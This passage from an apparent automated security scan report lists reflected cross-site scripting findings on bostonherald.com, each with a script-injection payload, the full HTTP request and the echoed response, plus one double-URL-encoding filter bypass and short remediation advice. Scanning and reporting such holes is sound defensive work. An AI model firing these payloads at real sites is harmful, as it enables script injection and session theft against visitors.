<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/sports/rap_sheet/index.php/201159440\"><script>alert(1)</script>a90735c589b/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/">
...[SNIP]...

4.782. http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ea2b"><script>alert(1)</script>c53f3083bf9 was submitted in the REST URL parameter 5. This input was echoed as 8ea2b\"><script>alert(1)</script>c53f3083bf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/sports/red_sox/index.php/20118ea2b"><script>alert(1)</script>c53f3083bf9/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:03:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/red_sox/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:03:01 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/sports/red_sox/index.php/20118ea2b\"><script>alert(1)</script>c53f3083bf9/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/">
...[SNIP]...

4.783. http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9bc2"><script>alert(1)</script>4c7b0ea2d57 was submitted in the REST URL parameter 6. This input was echoed as b9bc2\"><script>alert(1)</script>4c7b0ea2d57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/sports/red_sox/index.php/2011/01b9bc2"><script>alert(1)</script>4c7b0ea2d57/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:04:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/red_sox/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:03:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/sports/red_sox/index.php/2011/01b9bc2\"><script>alert(1)</script>4c7b0ea2d57/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/">
...[SNIP]...

4.784. http://www.bostonherald.com/includes/processAds.bg [companion parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc2d1"><script>alert(1)</script>6c821273efd was submitted in the companion parameter. This input was echoed as bc2d1\"><script>alert(1)</script>6c821273efd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottombc2d1"><script>alert(1)</script>6c821273efd&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2112
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottombc2d1\"><script>alert(1)</script>6c821273efd!x14">
...[SNIP]...

4.785. http://www.bostonherald.com/includes/processAds.bg [companion parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a67b1</script><script>alert(1)</script>4ab8f6765b0 was submitted in the companion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottoma67b1</script><script>alert(1)</script>4ab8f6765b0&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2148
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
CROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottoma67b1</script><script>alert(1)</script>4ab8f6765b0!x14">
...[SNIP]...

4.786. http://www.bostonherald.com/includes/processAds.bg [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea775"><script>alert(1)</script>9030106f1a6 was submitted in the page parameter. This input was echoed as ea775\"><script>alert(1)</script>9030106f1a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhomeea775"><script>alert(1)</script>9030106f1a6 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2112
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/homeea775\"><script>alert(1)</script>9030106f1a6@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14">
...[SNIP]...

4.787. http://www.bostonherald.com/includes/processAds.bg [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37376%2527%253balert%25281%2529%252f%252fe6f611bda68 was submitted in the page parameter. This input was echoed as 37376';alert(1)//e6f611bda68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome37376%2527%253balert%25281%2529%252f%252fe6f611bda68 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2016
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
'HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/home37376';alert(1)//e6f611bda68@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14">
...[SNIP]...

4.788. http://www.bostonherald.com/includes/processAds.bg [position parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7107c</script><script>alert(1)</script>2ef88115157 was submitted in the position parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=x147107c</script><script>alert(1)</script>2ef88115157&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2143
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
LING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x147107c</script><script>alert(1)</script>2ef88115157">
...[SNIP]...

4.789. http://www.bostonherald.com/includes/processAds.bg [position parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6b75"><script>alert(1)</script>72445af01e was submitted in the position parameter. This input was echoed as a6b75\"><script>alert(1)</script>72445af01e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=x14a6b75"><script>alert(1)</script>72445af01e&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2101
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14a6b75\"><script>alert(1)</script>72445af01e">
...[SNIP]...

4.790. http://www.bostonherald.com/mediacenter/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b77b'-alert(1)-'44e32132f58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/?7b77b'-alert(1)-'44e32132f58=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:23:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 450978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<script type="text/javascript">
            // For pop-up windows in Now Playing pane
            hide_id = 0;
               
            // Converts the GET params to a JSON object
               mcParams = '7b77b'-alert(1)-'44e32132f58=1'.toQueryParams();
               
               //alert(Object.inspect(mcParams));
               
               function updateData(key,val) {
                   
                   // update paramaters JSON
                   mcParams[key] = val;
                   
                   // Show loadi
...[SNIP]...

4.791. http://www.bostonherald.com/mediacenter/video.php [bc_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the bc_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ff3"><script>alert(1)</script>0e6ae86ba81 was submitted in the bc_id parameter. This input was echoed as 59ff3\"><script>alert(1)</script>0e6ae86ba81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300&bc_id=76678385900159ff3"><script>alert(1)</script>0e6ae86ba81&rand=408 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2577
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<object id="myExperience76678385900159ff3\"><script>alert(1)</script>0e6ae86ba81" class="BrightcoveExperience">
...[SNIP]...

4.792. http://www.bostonherald.com/mediacenter/video.php [height parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6d42"><script>alert(1)</script>dad1887e031 was submitted in the height parameter. This input was echoed as e6d42\"><script>alert(1)</script>dad1887e031 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300e6d42"><script>alert(1)</script>dad1887e031&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2577
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<param name="height" value="300e6d42\"><script>alert(1)</script>dad1887e031" />
...[SNIP]...

4.793. http://www.bostonherald.com/mediacenter/video.php [media_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the media_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da509</script><script>alert(1)</script>08312a85049 was submitted in the media_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024da509</script><script>alert(1)</script>08312a85049&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:01:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2639
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
se");

    tmObj.set("VideoURL", "http://www.bostonherald.com/mediacenter/retrieve_video.php?redirect=http%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20110127%2F012711snowar.flv&video_id=2024da509</script><script>alert(1)</script>08312a85049");
tmObj.set("VideoTitle", "Sidewalk");
tmObj.set("Category", "");

           // Default slate image
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_pla
...[SNIP]...

4.794. http://www.bostonherald.com/mediacenter/video.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 521f5</script><script>alert(1)</script>224f4942aaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Side/521f5</script><script>alert(1)</script>224f4942aaawalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
